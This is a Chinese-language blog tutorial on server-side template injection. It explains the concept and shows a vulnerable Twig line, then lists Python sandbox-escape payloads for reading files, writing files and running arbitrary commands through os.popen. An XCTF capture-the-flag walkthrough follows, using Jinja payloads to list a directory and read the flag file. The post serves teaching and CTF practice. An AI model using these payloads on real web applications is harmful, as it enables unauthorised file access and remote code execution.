SSTI模板注入

已于 2022-05-11 14:29:21 修改
阅读量564 收藏
点赞数 1
文章标签: python 网络安全 web安全
于 2022-04-27 19:45:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52016680/article/details/124457573
版权

一、概念(废话)

SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。

二、模板引擎(摘自百度百科)

模板引擎不属于特定技术领域,它是跨领域跨平台的概念。在Asp下有模板引擎,在PHP下也有模板引擎,在C#下也有,甚至JavaScriptWinForm开发都会用到模板引擎技术。

模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这就大大提升了开发效率,良好的设计也使得代码重用变得更加容易。

#沙盒

沙盒就好比虚拟机,即使被攻击也不会对真实的环境造成影响,当被病毒破坏后也十分容易重构。再讲一下蜜罐,蜜罐跟沙盒是完全不同的,沙盒的作用像是将恶意的软件放在一个封闭的盒子里进行测试,而蜜罐则是一个陷阱,专门引诱攻击者进行入侵,像是伪造了一个实际的网络,有文件服务器、web服务器等,在攻击者渗透的同时监视攻击者的行为从而分析攻击方式进行预防。

三、SSTI

借用另一篇博客的例子

$output = $twig->render("Hello {{name}}", array("name" => $_GET["name"])); 
echo $output;

此处的name就会产生模板注入漏洞。

这里用vulhub的SSTI靶场环境举个例子

记住这个guest

注意我的url里面多了一个name的传参,形式是用两个大括号包起来的表达式,而guest变成了表达式运算后的值,说明我们传入的参数被执行了。 

Python的SSTI

__class__:用于返回对象所属的类
__bases__:以元组的方式返回一个类所继承的类
__mro__:返回解析方法调用的顺序,按照子类到父类到父父类的顺序返回所有的类
__subclasses__():获取类的所有子类
__init__:所有自带的类都包含init方法,常用它当跳板来调用globals
__globals__:返回当前位置的全部模块,方法和全局变量,用于配合init使用
//获取基本类
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object

//读文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()

//写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')

//执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )

四、XCTF-WEB进阶区 Web_python_template_injection

测试模板注入点

注意url和我选中的部分,我们在url上加了{{7*8}},返回了56,说明命令被执行了,存在SSTI注入。

思路:找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。

下面的操作就是一般模板注入的常规套路了,请大家注意每一张图片的url。

 {{config}}:查看全局变量

{{''.__class__.__mro__[2].__subclasses__()}}

发现一个type file,说明它的类型是文件,可以进行读取。

{{ ''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__ }}

 可以看到有一个 <class ‘site._Printer’>类型(可以进行命令执行)

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}} 

发现f14g文件,进行读取。

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

参考博客链接:

SSTI完全学习_大千SS的博客-CSDN博客_ssti

SSTI模板注入

攻防世界-Web_python_template_injection详解_Mr H的博客-CSDN博客

4ooo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
深入浅出带你了解SSTI模板注入
Candour_0的博客
02-19 507
深入浅出带你了解SSTI模板注入
PTE SST和RL模板
m0_62574889的博客
11-08 508
事实证明,SST分值占比很小,不是很需要好好练 SST的模板: RL模板: 给你一个模版供参考: RA技巧 为什么说日本人团结
模板注入SSTI
Be Smart
03-16 332
layout: post title: “SSTI模板注入” categories: [网络安全CyberSecurity] tags: [SSTI] 模板注入SSTI简介 何为模板引擎(SST) ​ 百度百科:模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。 ​ 个人理解就是:一个html页面中没有实际内容,但是有变量,访问这个页面时需要将这个变量转换成预期的内容,这时.
SSTI注入——python中的ssti
wwwwyyyrre的博客
06-05 815
python里的运用最多的应该就是flask模板注入 也可以直接用tplmap自动化注入来找到ssti注入python21.2.3.4.5.6.python31.2.
SSTI(模块注入)的简单学习
dbabs的博客
02-05 629
SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
tplmap:服务器端模板注入和代码注入检测与开发工具
05-03
Tplmap通过许多沙箱转义技术来帮助利用代码注入和服务器端模板注入漏洞来访问底层操作系统。 开发该工具及其测试套件是为了研究SSTI漏洞类别,并在Web应用程序渗透测试期间用作攻击性安全工具。 沙盒突破技术来自...
tplmap.zip
07-26
此工具类似于sqlmap,用于ssti漏洞,可一键进行模板注入。啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊 。。。。。。。。。。。。。。。。。。。。。。。
SSTI
03-09
SSTI
fenjing工具,ssti
最新发布
12-17
fenjing一把梭哈ssti,简单绕过waf
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
flaskssti:测试SSTI
02-21
烧瓶
Flask SSTI/沙箱逃逸的一些总结
01-20
模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期...
ssti 模板注入
q1415500189的博客
04-02 2436
tqlmap yyds!!
SSIT模板注入
RuiLike的博客
07-02 403
存在这三种语法控制结构 {% %}变量取值 {{ }}注释 {# #}
适合小白学的基础知识—SSTI漏洞学习
xiangxue666的博客
02-26 135
适合小白学的基础知识—SSTI漏洞学习
Ruby ERB模板注入检测
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-06 513
​了解Ruby ERB模板注入,Ruby ERB模板注入检测。 ERB是Ruby自带的 require 'erb' template = "text to be generated: " erb_object = ERB.new(template) x = 5 puts erb_object.result(binding()) x = 4 puts erb_object.result(binding())
ssti模板注入payload
09-26
关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值